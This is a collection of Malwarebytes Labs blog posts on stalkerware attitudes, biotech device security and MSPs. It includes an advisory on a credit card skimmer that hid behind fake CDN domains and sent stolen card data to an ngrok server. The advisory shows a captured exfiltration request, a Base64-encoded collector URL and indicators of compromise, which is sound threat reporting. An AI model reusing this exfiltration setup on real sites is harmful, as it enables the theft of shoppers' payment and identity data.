stalking behavior and perceptions to stalking behavior, a spokesperson said the
agency does not keep such statistics.

The Bureau of Justice Statistics, which also tracks stalking in America, did not respond to a request for similar data.

Despite the two agencies’ robust datasets on the threat of
stalking, the NortonLifeLock survey revealed a different perspective on similar
behavior—a potentially concerning coziness with it. Young Americans in
particular, the survey showed, found little threat in online stalking.

The survey said that 45 percent of those aged 18–34 found
online stalking to be “harmless.” The same age group most heavily engaged in
the behavior—65 percent said they have “checked in on a current or former
significant other.”

Domestic abuse advocates argue that those high statistics
reflect a society that fails to fully recognize the harms of stalking,
cyberstalking, and invasive behavior toward romantic partners. Further, the
language actually used in the survey might point to less nefarious
interpretations by young people.

The normalization and minimization of stalking

Despite the NortonLifeLock study revealing troubling
perceptions of online stalking behavior, Erica Olsen, director of Safety Net at
National Network to End Domestic Violence, said these perceptions existed long
before the advent of technology-enabled abuse. It’s been happening for decades,
Olsen said.

“I unfortunately think that stalking behaviors have always,
to some extent, been accepted and minimized.” Olsen said. “I think a lot of it
has to do with the romanticizingof some of the behaviors—specifically
following and spying.”

Olsen pointed to many romantic comedies that portray
stalking as endearing.

In The Graduate, Dustin Hoffman’s character follows
Katharine Ross’s character despite explicitly being told to drop contact, much
like John Cusack’s character in Say Anything ignores the wishes of his
ex-girlfriend played by Ione Skye. The 1954 film Seven Brides for Seven
Brothers
involves several men who kidnap a group of women, and no, it isn’t
a horror movie.

As The New Statesmen wrote:

“A group of brothers kidnap six attractive women by causing
a life-threatening avalanche that keeps them imprisoned all winter. The women
play pranks on the men in revenge, and, in a shocking case of Stockholm
syndrome, everyone has an all-round jolly time. They pair off and are all
married by summer.”

These types of films can impact audience perceptions of
intrusive and aggressive behavior, found Julia Lippman, a research fellow at
the Center for Political Studies-Institute for Social Research at the
University of Michigan.

According to Lippman’s paper, “I Did It Because I Never Stopped Loving You: The Effects of Media Portrayals of Persistent Pursuit on Beliefs About Stalking,” women who watched movies with positive portrayals of aggressive romantic pursual were more likely to accept those behaviors, as opposed to women who watched movies with scary or threatening depictions of those same types of behaviors.

In speaking to the online outlet Bustle, Lippman said:

“Positive media portrayals of stalking—like those where
the pursuer is rewarded by ‘getting the girl’— can lead people to see stalking
in a more positive light.”

Media portrayals aside, another factor could play a role in the public’s acceptance of online stalking that amounts to digital surveillance—the privatization of surveillance in our own neighborhoods. Millions of smart doorbells have crept into countless suburbs across America, capturing footage of package thieves, yes, but, more often, of neighbors, children, and animals engaged in harmless behavior.

According to a survey conducted by The Washington Post,
smart doorbell owners who understood the privacy risks of their devices said
the risks were not enough to deter them from ownership. As The Washington Post
wrote:

“[In] the unscientific survey, most people also replied that
they were fine with intimate new levels of surveillance—as long as they were
the ones who got to watch.”

Finally, the acceptance of “online stalking” by younger
generations could intersect with emerging ways of staying in touch with one
another, and with the language that young people—particularly teenagers—use.

Diana Freed, a PhD student at the Intimate Partner
Violence tech research lab
 led by Cornell Tech faculty, said that, in
her research, she has found that teenagers often use the term “stalking” in a
harmless way to check in on people online.

“It’s a very common term used with teens—‘Let’s stalk that
person on Instagram,’—but they’re not saying it with the intent to harm,” Freed
said.

(Full disclosure, when this Malwarebytes Labs writer
attended college, he frequently heard the words “Facebook stalk” used to
describe looking up a romantic crush, whether that meant viewing their photos
or trying to find their “Relationship Status.”)

Freed said many apps also provide an opportunity for
“wholesome” viewing of other people’s lives. With features like TikTok’s
constant video feed or Snapchat Stories and Instagram Stories—which give users
the ability to post phots and short videos for only 24 hours—users can view
another user’s daily activities, despite being physically separated. That type
of behavior does not have to be covert, Freed said, and can be done “with full
knowledge” between two people who are friends offline.

“The ability to follow people closely is made available to
us just by the features offered,” Freed said.

As to whether the presence of the technology
itself—including stalkerware-type apps—has somehow created more stalkers, no
expert interviewed for this piece saw a provable correlation.

Roberts of NNEDV said that even before the proliferation of
GPS devices and stalkerware, domestic abusers would excuse their persistent,
physical following of their partners by saying they were merely concerned for
their partner’s safety. Today, she said, abusers use the same lies—urging survivors
to use GPS location apps or stalkerware as a way to ensure safety.

“So, while we can potentially say that people are just more
inclined to be accepting of this behavior today,” Roberts said, “I believe the
truth is that people have always minimized these types of ‘caring’
behaviors as they appear to be done out of concern.”

Moving forward

All of this presents two concerning realities—Americans are
growing warm to online stalking; Americans have always accepted stalking. Neither
is the type of reality that should go unopposed.

Remember, online stalking that violates a person’s privacy is not harmless. Many of the behaviors described in the survey are the same types of behaviors that domestic abuse survivors face every day, from using stalkerware to learn private information, to tracking a person’s GPS location as a means to find them to inflict violence.

For years, Malwarebytes has worked to detect and raise
awareness about invasive monitoring apps that can pry into users’ lives without
their consent
. This latest survey only proves that more work is needed.
We’re ready for it.

The post Stalkerware and online stalking are accepted by Americans. Why? appeared first on Malwarebytes Labs.

Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server

Threat actors love to abuse legitimate brands and infrastructure—this, we know. Last year we exposed how web skimmers had found their way onto Amazon’s Cloudfront content delivery network (CDN) via insecure S3 buckets. Now, we discovered scammers pretending to be CDNs while exfiltrating data and hiding their tracks—another reason to keep watchful eye on third-party content.

Sometimes, what looks like a CDN may turn out to be anything but. Using lookalike domains is nothing new among malware authors. One trend we see a fair bit with web skimmers in particular is domains that mimic Google Analytics: Practically all websites use this service for their ranking and statistics, so it makes for credible copycats.

In the latest case, we caught scammers using two different domains pretending to be a CDN. While typically the second piece of the infrastructure is used for data exfiltration, it only acts as an intermediary that attempts to hide the actual exfiltration server.

Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service—a reverse proxy software that creates secure tunnels—to collect the stolen data. This combination of tricks and technologies shows us that fraudsters can devise custom schemes in an attempt to evade detection.

Inspecting code for unauthorized third-parties

We identified suspicious code on the website for a popular Parisian boutique store. However, to the naked eye, the script in question looks just like another jQuery library loaded from a third-party CDN.

site
Figure 1: Compromised online store, with source code showing a CDN like domain

Although the domain name (cdn-sources[.]org) alludes to a CDN, and unveil.js is a legitimate library, a quick look at the content shows some inconsistencies. There should not be fields looking for a credit card number for this kind of plugin.

souce
Figure 2: A malicious third-party library impersonating a legitimate one

To clear any doubts, we decided to check an archived copy of the site and compared it with a live snapshot. We can indeed see that this script did not exist just a couple of weeks prior. Either it was added by the site owner, or in this case, injected by attackers.

injection
Figure 3: Snapshots comparing online store before and after the hack

The script checks for the current URL in the address bar and if it matches with that of a checkout page, it begins collecting form data. This typically includes the shopper’s name, address, email, phone number, and credit card information.

stepinto
Figure 4: Another fake CDN domain used as part of the data exfiltration process

Data exfiltration via ngrok server

Once this data is collected, the skimmer will exfiltrate it to a remote location. Here, we see yet another CDN lookalike in cdn-mediafiles[.]org. However, after checking the network traffic, we noticed this is not the actual exfiltration domain, but simply an intermediary.

GET https://cdn-mediafiles.org/cache.php HTTP/1.1
Host: cdn-mediafiles.org
Connection: keep-alive
Accept: /
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Referer: https://www.{removed}.com/checkout/onepage/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 36
Ly9kNjgzNDRmYi5uZ3Jvay5pby9hZC5waHA=

Instead, the GET request returns a Base64 encoded response. This string, which was already present in the original skimmer script, decodes to //d68344fb.ngrok[.]io/ad.php which turns out to be the actual exfiltration server.

Figure 5: Customer data being stolen and exfiltrated to ngrok server

Ngrok is software that can expose a local machine to the outside as if it was an external server. Users can create a free account and get a public URL. Crooks have abused ngrok to exfiltrate credit card data before.

To summarize, the compromised e-commerce site loads a skimmer from a domain made to look like a CDN. Data is collected when a shopper is about to make a payment and sent to a custom ngrok server after a simple redirect.

traffic
Figure 6: Traffic flow, from skimming to data exfiltration

The above view is simplified, only keeping the key elements responsible for the skimming activity. In practice, network captures will contain hundreds more sequences that will make it more difficult to isolate the actual malicious activity.

Blocking and reporting

We caught this campaign early on, and at the time only a handful of sites had been injected with the skimmer. We reported it to the affected parties while also making sure that Malwarebytes users were protected against it.

webblock
Figure 7: Malwarebytes blocking the skimmer on the checkout page

Threat actors know they typically have a small window of opportunity before their infrastructure gets detected and possibly shutdown. They can devise clever tricks to mask their activity in addition to using domains that are either fresh or belong to legitimate (but abused) owners.

While these breaches hurt the reputation of online merchants, customers also suffer the consequences of a hack. Not only do they have to go through the hassle of getting new credit cards, their identities are stolen as well, opening the door to future phishing attacks and impersonation attempts.

Indicators of Compromise

Web skimmer domain

cdn-sources[.]org

Web skimmer scripts

cdn-sources[.]org/jquery.unveil.js
cdn-sources[.]org/adrum-4.4.3.717.js
cdn-sources[.]org/jquery.social.share.2.2.min.js

Redirect

cdn-mediafiles[.]org/cache.php

Exfiltration URL

d68344fb.ngrok[.]io/ad.php

The post Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server appeared first on Malwarebytes Labs.

Introducing Lock and Code: a Malwarebytes Labs podcast

Intrepid Labs readers might be happy to know that we’re stepping into territory long-requested and desired: we’re launching a podcast.

Malwarebytes researchers and reporters are on the front lines of cybercrime, delivering both fast-breaking news and thoughtful features on our blog to raise awareness and help users stay safe and private online. We want to take what we do here and bring it to a new medium so that even more folks can incorporate cybersecurity lessons into their daily lives.

As our real world and online world continue to blend, staying secure and aware are ever more critical in defending against attacks from criminals and encroachment on privacy from big tech. And that’s why, every two weeks, we’ll be breaking down the top headlines into easily digestible soundbytes and inviting marquee experts, both in-house and outside, to dive deep into some of the more complex issues.

Take a listen to the trailer for our podcast—Lock and Code—for a taste of things to come:

Lock and Code, a Malwarebytes podcast

Tune in next Monday, March 2, for the first episode of Lock and Code, where host David Ruiz will break down news from the RSA floor, plus talk with the annual conference’s Director of Content and Curation Britta Glade on this year’s theme: the human element.

The post Introducing Lock and Code: a Malwarebytes Labs podcast appeared first on Malwarebytes Labs.

Biotech health care innovations meet security challenges

The level and speed of innovations taking place in the biotech industry are baffling. On the one hand, it makes us hopeful we can quickly reduce the number of illnesses and their consequences through technological advancement—saving thousands of lives. On the other, concerns about the application of Internet-connected technology leave us wondering: at what cost?

Where does the mix of technology and medicine lead us? Advancements in genetic therapy have reshaped cancer treatment as we know it. Yet, other applications, such as automating medicine intake by measuring biometrics, may introduce whole other problem sets the medical and security world haven’t solved for.

Knowing that every human body is unique and may react in another way to the same procedure, it seems prudent to draw the line at a certain amount of automation. But how do we determine where to draw the line? Is it smart to leave that decision to the big pharmaceuticals? Let’s have a look at the developments in biotech that require bigger picture thinking from the security and privacy perspectives.

Developments in the health care industry

Some of the most promising health care developments in late stages of refining or even already in use are techniques where sensors are attached to or inserted into the patient’s body. The sensors are designed to transmit data about certain bodily conditions back to healthcare personnel.

One such technology is inserted directly into patients’ medication via chip. These “smart pills” send biometric data from within the blood stream. When the patient ingests the pill, the chip will be detected by a patch on her stomach the moment it is digested. If the patch doesn’t receive the appropriate signal, it alerts the patient’s doctor.

A big step forward for the future of smart pills will be the automation and timely administering of medicine; something currently in development. These smart pills are being designed to make patients life’s easier by embedding a tracking system in the pill that trigger the release of the drug in a timely manner, so you can’t forget.

Smart pills could also be programmed to release the medication when certain circumstances are met. A system similar to this already exists for diabetes. Insulin pumps for type 1 diabetics are in use that release insulin when a low blood sugar is detected, basically by mimicking the way the pancreas would behave for healthy people.

Diagnostic biotech

Existing bio-sensors are internal measurement devices that broadcast body metrics like blood pressure, pulse, oxygen saturation, blood sugar, etc. These bio-sensors and sensors measuring the presence of other substances in the blood can be used to finetune the administration of drugs. But what if anybody else can receive these transmissions?

The feasibility of multiplex biosensors for
bloodstream infection diagnosis has been under investigation for a few years
and is another development that could lead to transmissions concerning our health
from inside our body to a “smart” device.

Pharmaceutical companies have already released digital smart pills containing computer chips. The first digital cancer pill, which was released in early 2019, contains a chip and capsules filled with capecitabine, a cancer chemotherapy that patients need to take several times a day.

Other biotech innovations

The human genome has been almost fully mapped and we are rapidly finetuning the ability to read the map. But what does this prospect bode for the future of the information that can be extracted from the DNA samples we provided for various different reasons?  Will donating blood or participating in a DNA test now result in a privacy nightmare later on? Will the risk we take now grow on us as science finds out more about the information stored in our DNA.

DNA diseases
Genetically detectable diseases

With greater understanding of our genetics comes greater capacity for their manipulation. And gene editing currently stands as one of the most exciting, and worrying, areas within the biotech industry.

Another worrying advancement is the use of artificial intelligence (AI) to make the development of new drugs faster and cheaper. AI particularly can be used to reduce the amount of trial and error needed to design a drug candidate once a promising disease target had been identified. It can also be used to investigate and find unexpected use cases for drugs that fail in clinical trials. Promising changes, for sure. But what might AI miss that the human mind would catch? And how much would morality come into play if machines are conducting all of the testing?

Remote control of artificial limbs and animals

The advancement of modern prosthetics has
gone hand in hand with the upcharge in rapid developments in the biotech health
care sector.

In a combination of robotics and neuro-engineering
scientists are working on a new robotic hand that could be a life-changing
device for amputees. The goal is to read and transmit intended finger movement
read from the muscular activity on the amputee’s stump for individual finger
control of the prosthetic hand.

In the military field sharks and other
animals have been given brain implants that makes them remotely controllable. These
sharks could for example be used to find enemy submarines.

Communication protocols in biotech

The smart pill, produced and patented by Proteus and called Abilify MyCite, sends a simple pulse from the pill to the patch as soon as the pill gets absorbed by stomach acid. No problem there, but then the patch sends data like the time the pill was taken and the dosage to a smartphone app over Bluetooth. The data is stored in the cloud where the patient’s doctor and up to four other people chosen by the patient, can access the information. The patient can revoke their access at any time.

In 2017 the FDA stated it was planning to hire more staff with “deep understanding” of software development in relation to medical devices, and engage with entrepreneurs on new guidelines, because it expected to get more approval requests for digital pills. This was after the approval of Abilify MyCite, which is a typical symptom of legislation running after technical innovations without ever truly catching up.

In 2018 hackers demonstrated they could install malware on an implanted pacemaker after they had discovered bugs Medtronic‘s software delivery network, a platform that doesn’t communicate directly with pacemakers, but rather brings updates to supporting equipment like home monitors and pacemaker programmers, which health care professionals use to tune implanted pacemakers.

Bluetooth and medical devices

Bluetooth is ideal for the short-range, continuous wireless connection, that we use for streaming audio and data. The most commonly used Bluetooth protocols in medical equipment are Bluetooth Low Energy (BLE) and Bluetooth Classic

BLE is a Bluetooth protocol that was launched in 2010, it was designed to achieve goals of low power consumption and latency while accommodating the widest possible interoperable range of devices. The downside is that it can behave differently depending on smartphone platforms. This is because the device advertises on a schedule for smartphone response. When the smartphone responds, a handshake (bonding) is made, facilitating a confirmed transfer of the data packet to the smartphone before closing the connection. This saves energy, but it’s also responsible for unpredictable data transfer speed.

BLE also does not require paring between
the sender and receiver and it can send authenticated unencrypted data. We
understand the benefits of saving energy:

  • Devices can stay longer in the
    body without having to be replaced
  • Batteries can be smaller, so easier
    to insert and less obtrusive

But depending on the nature and particularly the sensitivity of the transmitted data, other considerations might come into play. Unfortunately BLE devices have also been found to be impacted by SweynTooth vulnerabilities.

Recommendations

Developers of medical devices who intend to use Bluetooth as the technology to connect devices with each other and with Wi-Fi should consider carefully which Bluetooth protocol is right for their system. To do this, it is important to have a clear understanding of the needs for the system and the available options.

Medical devices should be easily updatable for those circumstances where new vulnerabilities are found and patches or other important updates need to be applied.

Maybe the healthcare industry should even consider designing a new protocol similar to Bluetooth. Combining the Low Energy properties with some extra security measures might pay off in the long run.

Cloud solutions that are used to store
sensitive personal and medical data deserve to be held against a high security
standard.

We recommend only giving up your DNA
samples to trusted organizations and only for reasons of utmost importance like
your health.

Machines are not without fault or as smart as we might think. Blind trust in machines when it comes to healthcare can end in a catastrophy. There is an area where personal attention does a lot more good than the fully automated application of medicine can ever do.

Stay safe, and stay healthy!

The post Biotech health care innovations meet security challenges appeared first on Malwarebytes Labs.

Why managed service providers (MSP) are critical for business continuity

With the threat landscape becoming more hostile to businesses, small- and medium-sized businesses (SMBs) are often finding it difficult to cope. Hence, they turn to managed service providers (MSPs) for help, not only to keep their businesses going—the concept known as business continuity—but also to offer salve to known pain points that encompass all industries.

Short-staffed

One of the recognized pain points for SMBs is the apparent lack of skilled security professionals who can implement processes and procedures that snap back businesses to their original state of operations after experiencing a disruptive or business-ending event. With the cybersecurity industry experiencing a stunning zero percent unemployment rate with millions of opened positions, SMBs often have a hard time finding, or affording, “the right candidates.” Unfortunately, this staffing challenge is foreseen to continue through 2021. This could spell bad news for SMBs.

This doesn’t mean that there is no talent out there, however. Positions aren’t filled because many employers are underpaying for skilled specialistsMore remain open because employers and recruiters are looking inside a small bubble of candidates instead of exploring candidates with similar training and many of the appropriate “soft” skills, whose importance should not be overlooked in running IT and security teams. In addition, many current employees suffer from burnout, quitting their jobs after feeling overworked and underappreciated.

Conventional hiring trends, such as requiring experience and certifications at entry-level positions, plus a near-unreachable wish list of skills candidates must possess are other potential causes contributing to the shortage.

If an organization lacks the manpower to address their need to be resilient in the face of a threat landscape that is becoming more hostile toward business growth and evolution, a fully vetted MSP that offers tools and services that address an organization’s unique needs should step in to lighten the load.

Short budgets

SMBs are not known to set aside budget for security—another pain point. Unlike enterprises, we know that SMBs normally lack the resources they need to defend against cyberattacks. Whether that’s hiring the appropriate number of skilled staff, paying them a competitive salary, investing in security infrastructure, or purchasing enterprise-grade antivirus, network, and firewall protection, tight budgets typically mean corners must be cut.

Cybercriminals know this, and they are keen to pluck the low-hanging fruit. Therefore, it’s not a surprise to see an uptick of threat actors, particularly those behind ransomware campaigns, targeting SMBs—another reason why SMBs might consider using MSPs as an affordable alternative to full-blown security software suites to combat sophisticated malware attacks on-demand.

No training

Some businesses may be lucky enough to have the manpower, but still lack the foresight to provide staff with the knowledge and training in cybersecurity they will need and use throughout their entire tenure. While it is understandable to a degree, it’s also disconcerting to know that some organizations in industries severely targeted by malware attack campaigns, such as hospitals, schools, and government bodies, have little to no knowledge of what a phish looks like. And while it’s concerning that companies with IT security teams may not be as prepared as we expect them to be, even more worrying is the faith organizations put into their cybersecurity readiness, when it may not be as good as they thought.

Staff unskilled in cybersecurity cannot provide organizations the help they need to prevent security incidents. Time may be the key factor in deciding whether an organization should get some outside help or not. While they recognize the need to address the lack of training in their workforce, MSPs can help take charge and get things moving with little overhead.

Compliance, compliance

Cybersecurity standards are in place for a reason. Companies of all sizes need to know what it takes to build up their cybersecurity efforts, which in turn, makes a positive dent in their business resilience plans. MSPs may just be the answer they’re looking for.

MSPs are subject to well-known compliance regimes. This means that they don’t just follow one standard but many, and they likely overlap one another. For example, an organization based in New York who deals with clients in EU countries are subject to both the GDPR and regulations under the New York Department of Financial Services (DFS).

Helping take charge

SMBs have been feeling the pressure for years to respond to serious cybersecurity challenges their businesses face on a regular basis. They also know that such problems take time to address—they cannot be solved overnight. In the meantime, well-vetted MSPs can step in and help. Their fully qualified and trained staff can bridge the skills gap until a larger society shift happens (if it does); their resources, processes, and procedures make organizations they service compliant to known standards; and their overall service makes it easier for organizations to implement and manage in the long run.

The post Why managed service providers (MSP) are critical for business continuity appeared first on Malwarebytes Labs.